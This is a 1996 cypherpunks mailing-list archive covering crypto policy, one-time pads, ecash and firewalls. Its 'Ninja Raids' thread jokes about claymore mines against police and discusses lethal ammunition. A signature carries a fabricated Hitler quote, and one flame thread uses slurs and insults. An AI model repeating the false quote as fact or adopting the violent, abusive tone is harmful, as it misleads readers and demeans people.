From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 22 Jul 1996 07:38:52 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <Pine.SUN.3.91.960721155821.22581B-100000@tipper.oit.unc.edu>
Message-ID: <Pine.LNX.3.94.960721204851.1048D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 21 Jul 1996, Simon Spero wrote:

> Date: Sun, 21 Jul 1996 16:05:59 -0400 (EDT)
> From: Simon Spero <ses@tipper.oit.unc.edu>
> To: David Sternlight <david@sternlight.com>
> Cc: The Deviant <deviant@pooh-corner.com>,
>     Deranged Mutant <WlkngOwl@unix.asb.com>, cypherpunks@toad.com
> Subject: Re: A Snake-Oil FAQ
> 
> [sorry Perry]
> 
> On Sun, 21 Jul 1996, David Sternlight wrote:
> 
> > So is your comment. What was broken was not public key, but a particular
> > key length (and by implication shorter ones). You can do that with just
> > about any system, even a one-time pad, by brute force, but it won't buy you
> 
> Really? The only way I know of forcing a one-time pad is to use a hardware
> QM-based random number generator to generate every possible decrypt, thus
> creating a number of universes equal to the number of possible keys. Since
> you can't tell if you're universe is the right one, one should always
> verify the information obtained against a second source. IANAL, so I can't
> say if such a decrypt would count as probably cause. 
> 
> Simon
> 

Yes, but this is even more un-revealing than the OTP'd message, cause now
you have a list of messages that say

Nuke Siam.
Nuke Ohio.
Nuke Hell.
Nuke Shit.

and so on and so forth, and any of them could be right.
Its better just to rely on other techniques (physical key compromise, etc)
than to have the _complete_ list of possibilities on OTP...

> ---
> Cause maybe  (maybe)		      | In my mind I'm going to Carolina
> you're gonna be the one that saves me | - back in Chapel Hill May 16th.
> And after all			      | Email address remains unchanged
> You're my firewall -    	      | ........First in Usenet.........
					^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
					Umm... that would be Duke, next
					door in Durham...

					Of course, I'm an NCSU fan anyway,
					but...

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfKYgjAJap8fyDMVAQEHugf/QWCkRVsP4TYEUIp6ImA4NyDtnOCoI3qe
pGWvcEC/4qbuwXnYJR9yO+OSQ3Kh0zYOzhLxKCPwVHtm8uwjaELxSUD7qGJOVRU5
4rw/envcubQ+hYxzxIkPZnq7tosJpDp9mNZOLcwhmE+g4oAMv6dKMJautqB737CE
5AWQU2+Nb2/HQ7ZUSNae/CCDjZRVnTSbuKapCCz5YaYk7QwIOK2komVKmA1fI8xi
zLhdBagoS5Gtnt5nxnlHM+Gv57wxXZABJ4+woDbgr5/4grHkYW5Or3lqyNqV271A
gvGkxYE6eO9IJH50Ryf8eTXLU4J81iGxDLglM3KlgF4hdWi8RnRvUw==
=/egV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 13:45:01 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [NOISE} Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960720183725.00e38e60@mail.teleport.com>
Message-ID: <Pine.LNX.3.93.960721205913.130K-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996, Alan Olsen wrote:
> At 10:10 AM 7/20/96 -0800, Vinnie Moscaritolo wrote:
> >Speaking of Bob Hettinga put it to words best, told me that standing on the
> >Concord bridge he could see the colors of the American flag eminating
> >outwards to the rest of the country. Yup this is where it all started..
> Should teach him not to drink so much in the combat zone in Boston. ]:>

     Doesn't sound like he was drinking. Or if it was liquid, he didn't 
drink more than a drop or two...






(not to imply that a total stranger is into proscribe recreational 
pharmacuticles)
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lora Crouse <lcrouse@wesleyan.edu>
Date: Mon, 22 Jul 1996 13:38:53 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <199607220104.VAA24550@mail.wesleyan.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 03:21 AM 7/21/96 -0700, you wrote:
>He will cite
>Hudson, Heritage, RAND, ... AEI, and Cato whose shining lights best
>understand who it is that is signing their paychecks. These are the folks
>that bought us Vietnam, did not pay for it in lives or money, but profited
>immensely. 
>-- Llywarch Hen

I can assure you the Cato Institute would not have supported the Vietnam War
(assuming they had be in existence around that time, which they weren't).
They didn't even support the invasion of Iraq.  Maybe you should do a little
research before painting such a broad stroke against think tanks.

Lora





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Mon, 22 Jul 1996 14:52:50 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.16.19960722004904.1a3fece0@postoffice.worldnet.att.net>
Message-ID: <199607220407.VAA18687@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jul 1996, Llywarch Hen <ecgwulf@postoffice.worldnet.att.net> wrote:
[snip]
>I'd certainly agree with that, but would like to add that an unloaded gun is
>of no use and a gun in the nightstand or in the trunk of your car is also of
>no use. For all cases other than home intrusion, the gun has to be worn -- I
>recommend a shoulder holster. In the case of home intrusion, one can hope
>that the intruder has no desire to be successful and permits you to get the
>drop on him. Perhaps he'll slam the refrigerator door allowing you to fumble
>around under your pillow for your weapon. I know of people who have walked
>out of museums with paintings trailing alarm wires -- so let's hope our
>intruder is an amateur and best of all is scared off by some phony security
>signs, fake alarm wires, etc.

If you lock your doors and windows, forced entry generally becomes a noisy, 
somewhat time-consuming process that allows anyone not in a recreational drug 
induced stupor or coma sufficient time to pull a pistol out of their shoulder 
holster (or nightstand drawer, etc.) and pull the hammer back.  (2-3 seconds is 
all I need!)

>In these parts most guns seemed to be used by the temporarily depressed
>teenaged children of gun owners.

In the majority of cases, (although the margin is on the decline) when an armed 
homeowner confronts a burglar, the burglar runs like projectile diarrhea for the 
nearest exit, and no shots are fired.  However, these incidents are not counted 
as firearms "use", under current crime statistic collection methodology.  Many 
of these incidents are not reported, especially in areas where gun ownership is 
not approved by the authorities.  Furthermore, if your Cousin Vinnie the crack 
addict breaks into your house at 0300, attempts to rob you at knifepoint, and 
you force-feed him half a dozen jacketed hollow points for his trouble, the 
incident will usually be put in the same statistical category as the "crazed 
husband shoots wife, children, 11 neighbors, and 6 police officers" tragedies, 
even though you may never be charged with anything.  Most "studies" of crime 
statistics come from gun control advocacy groups, and are suitable primarily for 
lining the bottoms of birdcages.

>Now for street wear I strongly recommend a variety of loads. Probably my
>favorite is a reversed semi-wadcutter. This puppy is extremely inaccurate
>since it starts tumbling as it leaves the barrel. At extremely close ranges
>it'll tear up some flesh and further out it'll walk nastily through outer
>clothing completely wrecking it for formal wear and continue through enough
>skin to be damaging. Low on kinetic energy, it will however transfer its
>entire momentum where it counts. A semi-automatic will not properly feed
>these, so you gotta be traditional if you are of the big clip persuasion.

I have $10 US that says that this idiot has never fired a gun is his life.  
Furthermore, it is obvious he has no clue when it comes to bullet/target 
interaction.  A "reversed semi-wadcutter" is going to stay in its original shape 
(for the most part), which will tend to make it over-penetrate, wasting kinetic 
energy and endangering people behind the target.  Moreover, anyone who 
intentionally uses an inaccurate load is a fool--missed shots waste ammo, have 
no effect on the target, and run a significant risk of endangering innocent 
people.  A hollow point or Glaser is a much better option.

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 14:29:28 +0800
To: JonWienk@ix.netcom.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607202002.NAA17000@dfw-ix1.ix.netcom.com>
Message-ID: <Pine.LNX.3.93.960721210520.130L-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996 JonWienk@ix.netcom.com wrote:

> On Fri, 19 Jul 1996, ichudov@algebra.com (Igor Chudov @ home) wrote:
> >ninjas break in, everyone goes to hell. No need to wake up and be
> >alert in sleep -- all will be done automatically. So before that
> >ninja raid you will sleep better.
> A claymore mine would be much better.  It would send the "ninjas" to hell, 
> without necessarily forcing you to join them.

     You pop a claymore in a building with any substance up to the level of 
concrete re-enforced, and you _will_ be going with them.

     This is only to be used as a last resort, like calling in B-52 strikes
on your own location.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jul 1996 14:47:24 +0800
To: shabbir@vtw.org (Shabbir J. Safdar)
Subject: Re: CDT Policy Post 2.28 - FBI Director to Testify at Senate Crypto Hearing
Message-ID: <199607220425.VAA28120@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 7/21/96 -0400, Shabbir J. Safdar wrote:
>
>I would disagree with you here jim.  Perhaps you have a selective memory,
>but representatives from all the organizations attended the Clipper II
>hearings at NIST in Maryland and gave the pro-GAK folks a good drubbing.
>(with NIST's microphone too.  They're such good sports...)
>
>Person after person got up at the first of those (and subsequent ones) and
>grilled representatives from the FBI, NSA, NIST, and the White House.
>The ACLU, EPIC, EFF, CDT, and VTW were all there and pitched in.  Somehow


Okay, I should remember "never say never."  However, wasn't Clipper II about 
a year ago?  They're a little gun shy if they haven't arranged something 
since then.  I guess that's progress.


In any case, a gentle reminder:  I think you should withdraw the official 
position you originally publicized concerning the Leahy encryption bill.  
Fair enough?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jul 1996 18:42:14 +0800
To: cypherpunks@toad.com
Subject: Re: NSA Lawyers Believe ITARs Would be Overturned if Tested in Court
Message-ID: <199607220431.VAA28441@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:25 AM 7/22/96 -0700, Timothy C. May wrote:

>(Not all of them, presumably. Shipment of hardware ("arms") would likely
>not be affected. But the ITARs that stop the spread of knowledge, published
>papers, and speech (such as speaking where a foreigner can hear!) would
>likely be overturned.)
>--Tim May

Which raises an interesting question:  Why aren't they (still) restricting 
PC-type computers for export?  While it might not appear to make a great 
deal of sense either, a PC is just as much a tool for encryption as the 
software which runs on it.  And it's obvious that given the two scenarios 
below:

1.  You have a $1000 computer and no (freebie) software yet.

or

2.  You have freebie software and no $1000 computer.


You're closer ($) to being able to do encryption with the former set of 
equipment.  And, of course, nobody's under the illusion that the government 
can keep the software bottled up, but they'd at least have a prayer keeping 
most 486 and Pentium-based computers from being exported.

I don't mean to give the idiots any ideas, and it's too late anyway, but...



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jul 1996 11:36:18 +0800
To: BMCarpenter@trevecca.edu (Myers W. Carpenter)
Subject: Re: Credit Card to eCash
In-Reply-To: <v03007600ae1866520123@[205.219.251.54]>
Message-ID: <199607220232.VAA21581@homeport.org>
MIME-Version: 1.0
Content-Type: text


Well, theres the 90 days of float from the credit card clearing house,
and then the chance of non-payment.  The fraud issue (steal a credit
card, get $10,000 in e-cash...)

Adam


| 	What would be the problems in setting up a web site to make a
| charge to a Credit Card/ATM card number and return Cash, like an ATM for
| the net?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 14:37:09 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Netscape
In-Reply-To: <Pine.GUL.3.94.960720233212.873A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.LNX.3.93.960721214155.130N-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996, Rich Graves wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> On Sat, 20 Jul 1996, Mark M. wrote:
> > On Sat, 20 Jul 1996, Tom Weinstein wrote:
> > > Why not consider what the consequences will be?  Do you seriously
> > > believe that this will make the government stop enforcing ITAR?
> > The government has yet to enforce ITAR.  The only thing they have been doing
> > is threatening companies who make products with strong crypto.  If anyone was
> > ever actually put on trial for a violation of ITAR, it would almost certainly
> So do it. None of this anonymous bullshit, or trying to drag Netscape into
> it. 
> I'd donate whatever I could to a Cypherpunk Legal Defense Fund. We only need
> one volunteer with a lot of time on his/her hands. 

     Put up enough money to defend me and tell me how I can get arrested. 

     I'm not doing a lot at the moment, and I wouldn't mind getting my 15 
minutes of fame at this point. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jul 1996 15:35:49 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607220443.VAA29166@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:28 PM 7/21/96 -0500, snow wrote:
>On Sat, 20 Jul 1996, Elliot Lee wrote:
>> 
>> IOW, if a 'pre-dawn unannounced ninja raid' [sic] occurs on you, you are
>> pretty well beat, if only because the other side knows what they are doing
>> and you have no idea of their plans.
>> The only protection against lawlessness is not lawlessness, it is reason.
>
>     I'm probably starting to sound a little bellish on this,

"Post-bellum"?   B^)
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 22 Jul 1996 12:02:13 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: A Snake-Oil FAQ
Message-ID: <199607220206.WAA00212@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 21 Jul 96 at 6:03, The Deviant wrote:

> > I've written a short "Snake Oil FAQ" below.  It's incomplete and 
> > needs some work (adding a few definitions, rewording, aesthetic 
> > formatting, etc.), so think of it as a 'beta' FAQ (please don't
[..]
> Looks very nicely done.  I think you pretty much covered it... but...

Thanks.

> > Be wary of marketing gimmicks related to "if you can crack our
> > software" contests.  
> > 
> 
> Even the best cryptographers and security professionals have done this.
> RSA did it with their Public Key system, which took 20+ years to break.

Note the words "marketing gimmicks".  The $100 reward isn't a gimmick
in the same way as "we'll give you our company" or "we'll give you 
five free copies of our software".  But yes, that sentence could be 
reworded differently.

> Throughout history, many security mechanisms, even the best ones,
> including Cyphers, Locks, Firewalls, etc. have been known to go as far as
> to offer prizes (some extremely high, upwards of a million dollars, some
> as low as RSA's famous $100 prize)
> 
> I think that this one really is just a bit too broad.

Oddly enough, RSA's RC2/RC4 is also an exception to the proprietary 
algorithm warning, (some would dispute that), so that section 
needs some minor rewriting.

*sigh*

I'll work on it.


Thanks,
Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 17:21:19 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <v03007803ae188f5668ca@[192.187.162.15]>
Message-ID: <v03007800ae18b74ec8da@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:16 PM -0700 7/21/96, Simon Spero wrote:
>On Sun, 21 Jul 1996, David Sternlight wrote:
>>
>> It's not a "monkeys in the British Museum" problem, since when you hit the
>> right key sequences both encrypted text streams will fall cleanly
>> out--otherwise the chances are overwhelming (given a decently long run)
>> that one of the two streams will contain garbles or more likely be complete
>> gibberish.
>
>Not with one-time-pads... the key is as long as the plaintext. Our Hamlet
>writing monkeys will produce, amongst others, numerous versions of the
>play where the prince's name is telmaH. As well as vastly more where the
>monkeys get all the way to the last sentence and then
>
>One-Time-Pads offer perfect security as long as they're only used once. If
>they're used more than once, they're not one-time-pads.

This is getting silly. I made a comment about brute force search, explained
what I meant, and now some want to pick nits about semantics. My meaning
was clear. Things called "one time pads" have been broken when they were
reused. Breaking them is a matter of brute force search and checking both
decrypt streams for plaintext. If they are used correctly and not reused,
that approach isn't available. End of story.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 22 Jul 1996 13:34:50 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.SUN.3.91.960721191416.11723B-100000@crl2.crl.com>
Message-ID: <199607220255.VAA19757@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort wrote:
> On Sun, 21 Jul 1996 ichudov@algebra.com wrote:
> > Lots of kids impulsively do things that they later regret. Like, once
> > one little boy hit me hard in the head with a heavy stick from behind
> > my back...Now, if he or myself had access to a firearm, the life now
> > would not be nearly as good as it is.
> > 
> > I've seen these sudden destructive impulses in kids many times.
> 
> So have I, but your assertion begs the question.  In an unarmed
> society, people don't have to curb their impulse to the extent
> they do in an armed one.  As a result they often don't.  The
> Swiss and the Israelis seem to avoid internecine fratricide, even
> though guns are everywhere.  I don't think it is any coincidence
> that incivility and casual violence have increased in America in
> direct proportion to the ongoing orgy of victim disarmament.
> 
... snip ...

> Powerlessness is far more a cause of impulsive rages than the
> trust, responsibility and empowerment engendered by gun ownership.
> 

As I said, the kid who hit me in the head with a stick was 3-4 years
younger than me. You skipped that part. Correspondently, I could beat
him easily (I did, but his mother soon interrupted me), which was
obvious to him. So he had plenty of information that would deter a
rational person. He had all the reasons to "to curb his impulse", as
you said, and he could have thought about his punishment.

Still, he hit me. He was NOT a rational person, therefore. Just as
simple as that, that particular kid who hit me should not be trusted
with a firearm at his age.

This is a simple logical conclusion.

Your arguments apply to people who do not do impulsive things. To adults
for example. 

Again, I expressed my opinion about raising my own kids. I do not
have an opinion on whether parents in general should be allowed to
give guns to their kids or not, but I would not keep a firearm  in 
my home when I have kids. I may teach them gun safety or shooting, 
but would never leave them at home with access to guns.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Mon, 22 Jul 1996 12:33:30 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: Firewall Penetration
Message-ID: <v02130500ae1892b9c2f1@[204.167.109.225]>
MIME-Version: 1.0
Content-Type: text/plain


Frank Willoughby <frankw@in.net> wrote:

>FWIW, of @70 firwalls on the market, only @5 are adequate to protect
>a company from the hazards of the Internet.

        Ah, Frank,  are you talking here about session hijacking and is
end-to-end crypto the defining factor of the robust five?

        Suerte,
                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 18:30:12 +0800
To: John Young <jya@pipeline.com>
Subject: <rant> Re: Devil's Bargain
In-Reply-To: <199607211209.MAA05035@pipe6.t2.usa.pipeline.com>
Message-ID: <Pine.LNX.3.93.960721220053.130P-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jul 1996, John Young wrote:
>    The New York Times, July 21, 1996, WIR, p. 5. 
>    The Devil's Bargain of a Better World 
>    By Tim Weiner 
>    Washington. The arc of the burning plane falling into the 
>    ocean, the fire glowing on the dark waters, shed light on 
>    how vulnerable we are. When a jumbo jet falls from the sky, 
>    technology has failed or terrorism has succeeded. 
>    In the hours after Flight 800 went down off Fire Island, 
>    everyone in officialdom said there was no reason to believe 
>    it was a terrorist attack. Nearly everyone else 
>    instinctively believed it was. 


     Am I the only one in this country who, when hearing about TWA f800 
shrugged his shoulders and thought (or said) "Time flies and aeroplanes 
crash" (Name the band and album and I'll be impressed)?

     Shit breaks. When shit breaks or gets broken on an airplane, people
die. People do this (dying, but not on airplane) all the time, rich people
poor people, bright people, stupid people. 

     We all will die at some point, it is like taking a shit, everybody 
does it, and it has to happen. What is the big deal? I can understand feeling 
sad when a loved one dies, or happy when it happens to someone who you think
diserves it, but, like I said it'll happen to all of us sooner or later.

     I won't even go into the amount of coverage this crash got compared to
the inital reports of the value jet crash.  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 14:33:16 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Game Theory and its Relevance to Cypherpunks
In-Reply-To: <199607211513.KAA14942@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960721221302.130S-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jul 1996, Igor Chudov @ home wrote:
> Similarly, I do not uderstand why futurists paint so rosy pictures of
> the 21st century. I think that it will be at least just as full of shit
> as this one.

     I thought roses grew best in shit?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <fotiii@crl.com>
Date: Mon, 22 Jul 1996 13:36:39 +0800
To: cypherpunks@toad.com
Subject: Re: Credit Card to eCash
Message-ID: <199607220309.AA24954@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> |What would be the problems in setting up a web site to make a
> | charge to a Credit Card/ATM card number and return Cash, like an ATM for
> | the net?
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 

Obviously this would be tremendous!  There are a variety of ways
that one can construct a purse to allow use of a purchased amount of
ecash(tm)  without being a customer of a particular bank -  a nifty
idea if the credit card part works.

The "credit card thing" has been much discussed but really hinges on
 a change in the MC or VISA rules that either doesn't allow someone
to cancel the transaction at a later date leaving the acceptor
holding the bag, or allowing the acceptor to charge a fee that
covers the default risk of the former.  Currently according to my 
reading both are precluded.

Curiously, a little bird told me that the VISA _cash_ cards for
Atlanta allow you to call up to order one paying with a credit card,
and that it appears on one's statement as merchandise.  I would be
curious to hear what VISA rule changed to allow a non-face-to-face
cash advance to occur and call it merchandise!  Whatever.

Best,

FOT

My own ideas, not my employer's.
Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Mon, 22 Jul 1996 14:37:57 +0800
To: llurch@networking.stanford.edu
Subject: Re: Netscape
Message-ID: <199607220317.WAA21177@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: llurch@networking.stanford.edu, cypherpunks@toad.com
Date: Sun Jul 21 22:19:11 1996
> > The government has yet to enforce ITAR.  The only thing they have been 
doing
> > is threatening companies who make products with strong crypto.  If 
anyone was
> > ever actually put on trial for a violation of ITAR, it would almost
>  certainly
> > be found to be unconstitutional.
> 
> So do it. None of this anonymous bullshit, or trying to drag Netscape
>  into
> it.
> 
> I'd donate whatever I could to a Cypherpunk Legal Defense Fund. We only
>  need
> one volunteer with a lot of time on his/her hands.
> 
> -rich
> 

Could be fun.  I haven't been in a lawsuit in quite a while
(i.e. never).  I'd love to spend some time in court, as
a thought exercise and a token claim to fame.  I'll be
uploading something to  hacktic as soon as I can get
into Netscape's server to download it myself :)

dave


- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
"If a train station is where a train stops ...
                    ... then just what is a workstation?"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMfLzOTVTwUKWHSsJAQGEfAf/Su1LVpvIzhwuFKtMbR3j38gB+HnRjfvs
/yveJSWh5q+KooVHUvaKdkRwGFvs3Q/xpBaxnUTiZqsdpRcbAh6uKC/w8mYAe/Vt
GuaZl/eIz7FGRk5IF/yY691/R2yknxdujDSuzw5B+r9YJBvRqO5sCWbBfJFkElR0
3hDEy6PXddG69ujN+OYiqTAbgatee0jIycAZg5lYl45JVaNer0GcrJtNWqzfyMnI
5c91JAg/raOclYZPHqqNjqUqi1oTY+ItSeVgZ3QpBIs1ggG5wADG1uLsQZh4W6jn
e93PFYXJWC4AzNYxLIuI/eMj22yCn7d2EEniwH6gtmRK/k5oBiuOvA==
=hz7e
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 16:22:27 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007613ae18199394c5@[192.187.162.15]>
Message-ID: <Pine.LNX.3.93.960721222429.130U-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



     Sorry Perry, I tried. 

On Sun, 21 Jul 1996, David Sternlight wrote:

> At 10:24 AM -0700 7/21/96, Robert A. Hayden wrote:
> >The purpose of a librarian is to aid patrons in locating
> >materials and to maintain the order of the library.  The Library Bill of
> >Rights (which, of course, legally means nothing) guarantees access to any
> >materials by any patron.  If little eight year old Johnny Doe comes and
> >asks for _The Joy of Gay Sex_, a librarian is supposed to do nothing more
> >that point Johnny to the "J" section.
> Not in the cities I'm familiar with. And so to do would be wrong, in my
> view. In fact, library children's programs do a LOT more than simply aiding
> patrons in locating materials and maintaining the order of the library, so
> your contention is false on its face.

     Ok bonehead, explain the difference between LIBRARIAN and LIBRARY
CHILDREN'S PROGRAM. 

     Then go back and re-read what Mr. Hayden wrote. Then think about it for
a couple hours. Then look at what you wrote. Does what you wrote have 
more than a passing relationship with what Mr. Hayden wrote? 

     No. You ignored his point, you missed his point, and you didn't bother
to reply to his point, you just went blythly blathering along on your own 
self indulgent little course. 

     Let us look at this line by line:

> >The purpose of a librarian is to aid patrons in locating
> view. In fact, library children's programs do a LOT more than simply aiding

     Librarian != library children's program. 

> >materials and to maintain the order of the library.  The Library Bill of
> >Rights (which, of course, legally means nothing) guarantees access to any
> >materials by any patron.  If little eight year old Johnny Doe comes and
> >asks for _The Joy of Gay Sex_, a librarian is supposed to do nothing more
> >that point Johnny to the "J" section.
> Not in the cities I'm familiar with. And so to do would be wrong, in my
> view. In fact, library children's programs do a LOT more than simply aiding
> patrons in locating materials and maintaining the order of the library, so
> your contention is false on its face.

    How so Mr AssTorch? He contends that the Library Bill of Rights says one 
thing and you argue that the library childrens programs do a LOT more than 
this bill of rights says they must. 

    The US Bill of rights says a lot of things that our government ignores 
whenever possible, that doesn't mean that those words aren't written, nor
does it mean that they aren't in effect anywhere. 
y

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peng-chiew low <pclow@pc.jaring.my>
Date: Mon, 22 Jul 1996 00:40:41 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: Firewall Penetration
In-Reply-To: <9607211223.AA29688@su1.in.net>
Message-ID: <31F25025.3509@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Frank Willoughby wrote:

> FWIW, of @70 firwalls on the market, only @5 are adequate to protect
> a company from the hazards of the Internet.

And of course, we would have to pay to find that out, right? :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Mon, 22 Jul 1996 17:55:05 +0800
To: cypherpunks@toad.com
Subject: VTWW
Message-ID: <2.2.32.19960722054745.00718700@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Any of you New Yorkers know the Society for Electronic Access (SEA)? Maybe
you can comment on Mr. Safdar.

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Tue, 23 Jul 1996 03:57:42 +0800
To: "'cypherpunks@toad.com>
Subject: RE: evidence from the NIC - interpret and use as you will.
Message-ID: <01BB77AE.8D5826C0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Damn ... if this isn't a smoking gun, I don't know what is!
What's the phrase?  "Now go away" .....

----------
From: 	ante[SMTP:ante@nemesis.meaning.com]
Sent: 	Sunday, July 21, 1996 6:53 PM
To: 	cypherpunks@toad.com
